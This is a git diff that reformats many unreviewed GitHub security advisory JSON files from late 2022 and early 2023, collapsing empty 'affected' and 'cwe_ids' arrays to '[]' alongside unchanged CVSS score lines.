a/advisories/unreviewed/2022/12/GHSA-gx37-5pp8-f39c/GHSA-gx37-5pp8-f39c.json +++ b/advisories/unreviewed/2022/12/GHSA-gx37-5pp8-f39c/GHSA-gx37-5pp8-f39c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-h5j7-f7h8-6xm9/GHSA-h5j7-f7h8-6xm9.json b/advisories/unreviewed/2022/12/GHSA-h5j7-f7h8-6xm9/GHSA-h5j7-f7h8-6xm9.json index 46475017959..14625ecfabf 100644 --- a/advisories/unreviewed/2022/12/GHSA-h5j7-f7h8-6xm9/GHSA-h5j7-f7h8-6xm9.json +++ b/advisories/unreviewed/2022/12/GHSA-h5j7-f7h8-6xm9/GHSA-h5j7-f7h8-6xm9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-h9c6-4hvj-fcq7/GHSA-h9c6-4hvj-fcq7.json b/advisories/unreviewed/2022/12/GHSA-h9c6-4hvj-fcq7/GHSA-h9c6-4hvj-fcq7.json index 8a92f4ec4c9..ade62df3c32 100644 --- a/advisories/unreviewed/2022/12/GHSA-h9c6-4hvj-fcq7/GHSA-h9c6-4hvj-fcq7.json +++ b/advisories/unreviewed/2022/12/GHSA-h9c6-4hvj-fcq7/GHSA-h9c6-4hvj-fcq7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-hr63-35mr-q5r4/GHSA-hr63-35mr-q5r4.json b/advisories/unreviewed/2022/12/GHSA-hr63-35mr-q5r4/GHSA-hr63-35mr-q5r4.json index d53525990d5..d67b1bb4d68 100644 --- a/advisories/unreviewed/2022/12/GHSA-hr63-35mr-q5r4/GHSA-hr63-35mr-q5r4.json +++ b/advisories/unreviewed/2022/12/GHSA-hr63-35mr-q5r4/GHSA-hr63-35mr-q5r4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-hvj2-6339-q699/GHSA-hvj2-6339-q699.json b/advisories/unreviewed/2022/12/GHSA-hvj2-6339-q699/GHSA-hvj2-6339-q699.json index cebf41d28e3..2b17ca87f61 100644 --- a/advisories/unreviewed/2022/12/GHSA-hvj2-6339-q699/GHSA-hvj2-6339-q699.json +++ b/advisories/unreviewed/2022/12/GHSA-hvj2-6339-q699/GHSA-hvj2-6339-q699.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-j2c7-5g87-4vx7/GHSA-j2c7-5g87-4vx7.json b/advisories/unreviewed/2022/12/GHSA-j2c7-5g87-4vx7/GHSA-j2c7-5g87-4vx7.json index eaf62562ba5..b5dd90b9000 100644 --- a/advisories/unreviewed/2022/12/GHSA-j2c7-5g87-4vx7/GHSA-j2c7-5g87-4vx7.json +++ b/advisories/unreviewed/2022/12/GHSA-j2c7-5g87-4vx7/GHSA-j2c7-5g87-4vx7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-j9jm-9v86-98jx/GHSA-j9jm-9v86-98jx.json b/advisories/unreviewed/2022/12/GHSA-j9jm-9v86-98jx/GHSA-j9jm-9v86-98jx.json index 1c1c8a13d85..fbe9db57785 100644 --- a/advisories/unreviewed/2022/12/GHSA-j9jm-9v86-98jx/GHSA-j9jm-9v86-98jx.json +++ b/advisories/unreviewed/2022/12/GHSA-j9jm-9v86-98jx/GHSA-j9jm-9v86-98jx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-jm4h-87ww-hg6h/GHSA-jm4h-87ww-hg6h.json b/advisories/unreviewed/2022/12/GHSA-jm4h-87ww-hg6h/GHSA-jm4h-87ww-hg6h.json index eb8a678e8ab..c1ef7ba67c3 100644 --- a/advisories/unreviewed/2022/12/GHSA-jm4h-87ww-hg6h/GHSA-jm4h-87ww-hg6h.json +++ b/advisories/unreviewed/2022/12/GHSA-jm4h-87ww-hg6h/GHSA-jm4h-87ww-hg6h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-jp39-w6q8-xp3v/GHSA-jp39-w6q8-xp3v.json b/advisories/unreviewed/2022/12/GHSA-jp39-w6q8-xp3v/GHSA-jp39-w6q8-xp3v.json index f9c079c180b..a35c0570f92 100644 --- a/advisories/unreviewed/2022/12/GHSA-jp39-w6q8-xp3v/GHSA-jp39-w6q8-xp3v.json +++ b/advisories/unreviewed/2022/12/GHSA-jp39-w6q8-xp3v/GHSA-jp39-w6q8-xp3v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-jxrx-qmxj-6vrh/GHSA-jxrx-qmxj-6vrh.json b/advisories/unreviewed/2022/12/GHSA-jxrx-qmxj-6vrh/GHSA-jxrx-qmxj-6vrh.json index b62dbe3c8fe..f59e15e68de 100644 --- a/advisories/unreviewed/2022/12/GHSA-jxrx-qmxj-6vrh/GHSA-jxrx-qmxj-6vrh.json +++ b/advisories/unreviewed/2022/12/GHSA-jxrx-qmxj-6vrh/GHSA-jxrx-qmxj-6vrh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-m2gq-49cg-2x8w/GHSA-m2gq-49cg-2x8w.json b/advisories/unreviewed/2022/12/GHSA-m2gq-49cg-2x8w/GHSA-m2gq-49cg-2x8w.json index ca175603e96..1513d7b67a9 100644 --- a/advisories/unreviewed/2022/12/GHSA-m2gq-49cg-2x8w/GHSA-m2gq-49cg-2x8w.json +++ b/advisories/unreviewed/2022/12/GHSA-m2gq-49cg-2x8w/GHSA-m2gq-49cg-2x8w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-mcwf-x6h7-53cg/GHSA-mcwf-x6h7-53cg.json b/advisories/unreviewed/2022/12/GHSA-mcwf-x6h7-53cg/GHSA-mcwf-x6h7-53cg.json index 285bd2671c4..863375ac0de 100644 --- a/advisories/unreviewed/2022/12/GHSA-mcwf-x6h7-53cg/GHSA-mcwf-x6h7-53cg.json +++ b/advisories/unreviewed/2022/12/GHSA-mcwf-x6h7-53cg/GHSA-mcwf-x6h7-53cg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-mh6m-2q6x-x6qr/GHSA-mh6m-2q6x-x6qr.json b/advisories/unreviewed/2022/12/GHSA-mh6m-2q6x-x6qr/GHSA-mh6m-2q6x-x6qr.json index d9e778ecfb1..8842c4f5c6e 100644 --- a/advisories/unreviewed/2022/12/GHSA-mh6m-2q6x-x6qr/GHSA-mh6m-2q6x-x6qr.json +++ b/advisories/unreviewed/2022/12/GHSA-mh6m-2q6x-x6qr/GHSA-mh6m-2q6x-x6qr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-mqjq-qch6-x888/GHSA-mqjq-qch6-x888.json b/advisories/unreviewed/2022/12/GHSA-mqjq-qch6-x888/GHSA-mqjq-qch6-x888.json index e49d6c5bb20..3c1906be291 100644 --- a/advisories/unreviewed/2022/12/GHSA-mqjq-qch6-x888/GHSA-mqjq-qch6-x888.json +++ b/advisories/unreviewed/2022/12/GHSA-mqjq-qch6-x888/GHSA-mqjq-qch6-x888.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-p7m5-454h-5p2v/GHSA-p7m5-454h-5p2v.json b/advisories/unreviewed/2022/12/GHSA-p7m5-454h-5p2v/GHSA-p7m5-454h-5p2v.json index 8643d57a323..e48a19af821 100644 --- a/advisories/unreviewed/2022/12/GHSA-p7m5-454h-5p2v/GHSA-p7m5-454h-5p2v.json +++ b/advisories/unreviewed/2022/12/GHSA-p7m5-454h-5p2v/GHSA-p7m5-454h-5p2v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-p8xx-x79r-69w5/GHSA-p8xx-x79r-69w5.json b/advisories/unreviewed/2022/12/GHSA-p8xx-x79r-69w5/GHSA-p8xx-x79r-69w5.json index 6d7b03ddde2..c7176b1a23e 100644 --- a/advisories/unreviewed/2022/12/GHSA-p8xx-x79r-69w5/GHSA-p8xx-x79r-69w5.json +++ b/advisories/unreviewed/2022/12/GHSA-p8xx-x79r-69w5/GHSA-p8xx-x79r-69w5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-p9x5-vcr3-hxm9/GHSA-p9x5-vcr3-hxm9.json b/advisories/unreviewed/2022/12/GHSA-p9x5-vcr3-hxm9/GHSA-p9x5-vcr3-hxm9.json index 3557a700e1c..cf262aa5383 100644 --- a/advisories/unreviewed/2022/12/GHSA-p9x5-vcr3-hxm9/GHSA-p9x5-vcr3-hxm9.json +++ b/advisories/unreviewed/2022/12/GHSA-p9x5-vcr3-hxm9/GHSA-p9x5-vcr3-hxm9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-qpq2-6xwc-93r7/GHSA-qpq2-6xwc-93r7.json b/advisories/unreviewed/2022/12/GHSA-qpq2-6xwc-93r7/GHSA-qpq2-6xwc-93r7.json index 844d0e94fc7..3cd7b457104 100644 --- a/advisories/unreviewed/2022/12/GHSA-qpq2-6xwc-93r7/GHSA-qpq2-6xwc-93r7.json +++ b/advisories/unreviewed/2022/12/GHSA-qpq2-6xwc-93r7/GHSA-qpq2-6xwc-93r7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-qvjv-qf88-pvgp/GHSA-qvjv-qf88-pvgp.json b/advisories/unreviewed/2022/12/GHSA-qvjv-qf88-pvgp/GHSA-qvjv-qf88-pvgp.json index ff2cd0276f8..90eace27faf 100644 --- a/advisories/unreviewed/2022/12/GHSA-qvjv-qf88-pvgp/GHSA-qvjv-qf88-pvgp.json +++ b/advisories/unreviewed/2022/12/GHSA-qvjv-qf88-pvgp/GHSA-qvjv-qf88-pvgp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-r923-88h4-2x79/GHSA-r923-88h4-2x79.json b/advisories/unreviewed/2022/12/GHSA-r923-88h4-2x79/GHSA-r923-88h4-2x79.json index 863f33cedde..ce6d6ecb053 100644 --- a/advisories/unreviewed/2022/12/GHSA-r923-88h4-2x79/GHSA-r923-88h4-2x79.json +++ b/advisories/unreviewed/2022/12/GHSA-r923-88h4-2x79/GHSA-r923-88h4-2x79.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-rm98-3vrx-q6wp/GHSA-rm98-3vrx-q6wp.json b/advisories/unreviewed/2022/12/GHSA-rm98-3vrx-q6wp/GHSA-rm98-3vrx-q6wp.json index decff393b0c..bda33d6f348 100644 --- a/advisories/unreviewed/2022/12/GHSA-rm98-3vrx-q6wp/GHSA-rm98-3vrx-q6wp.json +++ b/advisories/unreviewed/2022/12/GHSA-rm98-3vrx-q6wp/GHSA-rm98-3vrx-q6wp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-rwp8-f63h-f6rp/GHSA-rwp8-f63h-f6rp.json b/advisories/unreviewed/2022/12/GHSA-rwp8-f63h-f6rp/GHSA-rwp8-f63h-f6rp.json index e981a1f3d81..a813cc22f75 100644 --- a/advisories/unreviewed/2022/12/GHSA-rwp8-f63h-f6rp/GHSA-rwp8-f63h-f6rp.json +++ b/advisories/unreviewed/2022/12/GHSA-rwp8-f63h-f6rp/GHSA-rwp8-f63h-f6rp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/12/GHSA-v23g-j6fr-6j58/GHSA-v23g-j6fr-6j58.json b/advisories/unreviewed/2022/12/GHSA-v23g-j6fr-6j58/GHSA-v23g-j6fr-6j58.json index 1dd22d02ff1..12d953a3449 100644 --- a/advisories/unreviewed/2022/12/GHSA-v23g-j6fr-6j58/GHSA-v23g-j6fr-6j58.json +++ b/advisories/unreviewed/2022/12/GHSA-v23g-j6fr-6j58/GHSA-v23g-j6fr-6j58.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-v7vc-4ppw-r84h/GHSA-v7vc-4ppw-r84h.json b/advisories/unreviewed/2022/12/GHSA-v7vc-4ppw-r84h/GHSA-v7vc-4ppw-r84h.json index bb89ba54561..2e8d222ffbf 100644 --- a/advisories/unreviewed/2022/12/GHSA-v7vc-4ppw-r84h/GHSA-v7vc-4ppw-r84h.json +++ b/advisories/unreviewed/2022/12/GHSA-v7vc-4ppw-r84h/GHSA-v7vc-4ppw-r84h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-vphf-w52x-98cw/GHSA-vphf-w52x-98cw.json b/advisories/unreviewed/2022/12/GHSA-vphf-w52x-98cw/GHSA-vphf-w52x-98cw.json index 676029790d7..6237170b3d3 100644 --- a/advisories/unreviewed/2022/12/GHSA-vphf-w52x-98cw/GHSA-vphf-w52x-98cw.json +++ b/advisories/unreviewed/2022/12/GHSA-vphf-w52x-98cw/GHSA-vphf-w52x-98cw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-vr33-265g-qgj3/GHSA-vr33-265g-qgj3.json b/advisories/unreviewed/2022/12/GHSA-vr33-265g-qgj3/GHSA-vr33-265g-qgj3.json index 821afe9dd3d..5241c58836e 100644 --- a/advisories/unreviewed/2022/12/GHSA-vr33-265g-qgj3/GHSA-vr33-265g-qgj3.json +++ b/advisories/unreviewed/2022/12/GHSA-vr33-265g-qgj3/GHSA-vr33-265g-qgj3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-w6hf-m4jf-9v6x/GHSA-w6hf-m4jf-9v6x.json b/advisories/unreviewed/2022/12/GHSA-w6hf-m4jf-9v6x/GHSA-w6hf-m4jf-9v6x.json index 1fcb9ff365b..b2b3c535eea 100644 --- a/advisories/unreviewed/2022/12/GHSA-w6hf-m4jf-9v6x/GHSA-w6hf-m4jf-9v6x.json +++ b/advisories/unreviewed/2022/12/GHSA-w6hf-m4jf-9v6x/GHSA-w6hf-m4jf-9v6x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-w9wh-9wcx-f2x4/GHSA-w9wh-9wcx-f2x4.json b/advisories/unreviewed/2022/12/GHSA-w9wh-9wcx-f2x4/GHSA-w9wh-9wcx-f2x4.json index 57cd81eb662..84741cc05a8 100644 --- a/advisories/unreviewed/2022/12/GHSA-w9wh-9wcx-f2x4/GHSA-w9wh-9wcx-f2x4.json +++ b/advisories/unreviewed/2022/12/GHSA-w9wh-9wcx-f2x4/GHSA-w9wh-9wcx-f2x4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-wpw9-595f-g34r/GHSA-wpw9-595f-g34r.json b/advisories/unreviewed/2022/12/GHSA-wpw9-595f-g34r/GHSA-wpw9-595f-g34r.json index 76749bfa010..35e7ac4360d 100644 --- a/advisories/unreviewed/2022/12/GHSA-wpw9-595f-g34r/GHSA-wpw9-595f-g34r.json +++ b/advisories/unreviewed/2022/12/GHSA-wpw9-595f-g34r/GHSA-wpw9-595f-g34r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-wqhm-mp79-4w7m/GHSA-wqhm-mp79-4w7m.json b/advisories/unreviewed/2022/12/GHSA-wqhm-mp79-4w7m/GHSA-wqhm-mp79-4w7m.json index 2ab17412d82..64a32858138 100644 --- a/advisories/unreviewed/2022/12/GHSA-wqhm-mp79-4w7m/GHSA-wqhm-mp79-4w7m.json +++ b/advisories/unreviewed/2022/12/GHSA-wqhm-mp79-4w7m/GHSA-wqhm-mp79-4w7m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-x37p-hm4v-vv28/GHSA-x37p-hm4v-vv28.json b/advisories/unreviewed/2022/12/GHSA-x37p-hm4v-vv28/GHSA-x37p-hm4v-vv28.json index 4bbc3ca1154..f935536843a 100644 --- a/advisories/unreviewed/2022/12/GHSA-x37p-hm4v-vv28/GHSA-x37p-hm4v-vv28.json +++ b/advisories/unreviewed/2022/12/GHSA-x37p-hm4v-vv28/GHSA-x37p-hm4v-vv28.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-x426-7wqr-wx8j/GHSA-x426-7wqr-wx8j.json b/advisories/unreviewed/2022/12/GHSA-x426-7wqr-wx8j/GHSA-x426-7wqr-wx8j.json index 203679f8b09..2fc194da771 100644 --- a/advisories/unreviewed/2022/12/GHSA-x426-7wqr-wx8j/GHSA-x426-7wqr-wx8j.json +++ b/advisories/unreviewed/2022/12/GHSA-x426-7wqr-wx8j/GHSA-x426-7wqr-wx8j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-xcmj-vx3m-mj2h/GHSA-xcmj-vx3m-mj2h.json b/advisories/unreviewed/2022/12/GHSA-xcmj-vx3m-mj2h/GHSA-xcmj-vx3m-mj2h.json index 34d792b4a1a..1f524d0d5b7 100644 --- a/advisories/unreviewed/2022/12/GHSA-xcmj-vx3m-mj2h/GHSA-xcmj-vx3m-mj2h.json +++ b/advisories/unreviewed/2022/12/GHSA-xcmj-vx3m-mj2h/GHSA-xcmj-vx3m-mj2h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-2254-5pm3-pmw5/GHSA-2254-5pm3-pmw5.json b/advisories/unreviewed/2023/01/GHSA-2254-5pm3-pmw5/GHSA-2254-5pm3-pmw5.json index 41629d482ee..a050dc09774 100644 --- a/advisories/unreviewed/2023/01/GHSA-2254-5pm3-pmw5/GHSA-2254-5pm3-pmw5.json +++ b/advisories/unreviewed/2023/01/GHSA-2254-5pm3-pmw5/GHSA-2254-5pm3-pmw5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-3cfp-9cr8-v26m/GHSA-3cfp-9cr8-v26m.json b/advisories/unreviewed/2023/01/GHSA-3cfp-9cr8-v26m/GHSA-3cfp-9cr8-v26m.json index c23d0bb4574..34c6cc6c0f0 100644 --- a/advisories/unreviewed/2023/01/GHSA-3cfp-9cr8-v26m/GHSA-3cfp-9cr8-v26m.json +++ b/advisories/unreviewed/2023/01/GHSA-3cfp-9cr8-v26m/GHSA-3cfp-9cr8-v26m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-3mf8-7qv9-pqph/GHSA-3mf8-7qv9-pqph.json b/advisories/unreviewed/2023/01/GHSA-3mf8-7qv9-pqph/GHSA-3mf8-7qv9-pqph.json index bf6abcf5f66..362674b0246 100644 --- a/advisories/unreviewed/2023/01/GHSA-3mf8-7qv9-pqph/GHSA-3mf8-7qv9-pqph.json +++ b/advisories/unreviewed/2023/01/GHSA-3mf8-7qv9-pqph/GHSA-3mf8-7qv9-pqph.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-56jw-rxhg-9q6g/GHSA-56jw-rxhg-9q6g.json b/advisories/unreviewed/2023/01/GHSA-56jw-rxhg-9q6g/GHSA-56jw-rxhg-9q6g.json index ddaefa6298d..b74e2245cf3 100644 --- a/advisories/unreviewed/2023/01/GHSA-56jw-rxhg-9q6g/GHSA-56jw-rxhg-9q6g.json +++ b/advisories/unreviewed/2023/01/GHSA-56jw-rxhg-9q6g/GHSA-56jw-rxhg-9q6g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-76w4-2fg3-x9mc/GHSA-76w4-2fg3-x9mc.json b/advisories/unreviewed/2023/01/GHSA-76w4-2fg3-x9mc/GHSA-76w4-2fg3-x9mc.json index 9c2b9663444..5030c6a8d03 100644 --- a/advisories/unreviewed/2023/01/GHSA-76w4-2fg3-x9mc/GHSA-76w4-2fg3-x9mc.json +++ b/advisories/unreviewed/2023/01/GHSA-76w4-2fg3-x9mc/GHSA-76w4-2fg3-x9mc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-7f7r-ffv7-v52r/GHSA-7f7r-ffv7-v52r.json b/advisories/unreviewed/2023/01/GHSA-7f7r-ffv7-v52r/GHSA-7f7r-ffv7-v52r.json index dd9f5ce9ec8..4234b97e7c9 100644 --- a/advisories/unreviewed/2023/01/GHSA-7f7r-ffv7-v52r/GHSA-7f7r-ffv7-v52r.json +++ b/advisories/unreviewed/2023/01/GHSA-7f7r-ffv7-v52r/GHSA-7f7r-ffv7-v52r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/01/GHSA-8xmh-56jj-w83c/GHSA-8xmh-56jj-w83c.json b/advisories/unreviewed/2023/01/GHSA-8xmh-56jj-w83c/GHSA-8xmh-56jj-w83c.json index 8de0906937a..69c6f319457 100644 --- a/advisories/unreviewed/2023/01/GHSA-8xmh-56jj-w83c/GHSA-8xmh-56jj-w83c.json +++ b/advisories/unreviewed/2023/01/GHSA-8xmh-56jj-w83c/GHSA-8xmh-56jj-w83c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/01/GHSA-cmpf-fmf9-35pm/GHSA-cmpf-fmf9-35pm.json b/advisories/unreviewed/2023/01/GHSA-cmpf-fmf9-35pm/GHSA-cmpf-fmf9-35pm.json index 375e72a8ee3..9d7e813d6c6 100644 --- a/advisories/unreviewed/2023/01/GHSA-cmpf-fmf9-35pm/GHSA-cmpf-fmf9-35pm.json +++ b/advisories/unreviewed/2023/01/GHSA-cmpf-fmf9-35pm/GHSA-cmpf-fmf9-35pm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/01/GHSA-cvhw-rhgw-75x5/GHSA-cvhw-rhgw-75x5.json b/advisories/unreviewed/2023/01/GHSA-cvhw-rhgw-75x5/GHSA-cvhw-rhgw-75x5.json index cf15886dfa5..cc3d971ef0f 100644 --- a/advisories/unreviewed/2023/01/GHSA-cvhw-rhgw-75x5/GHSA-cvhw-rhgw-75x5.json +++ b/advisories/unreviewed/2023/01/GHSA-cvhw-rhgw-75x5/GHSA-cvhw-rhgw-75x5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": 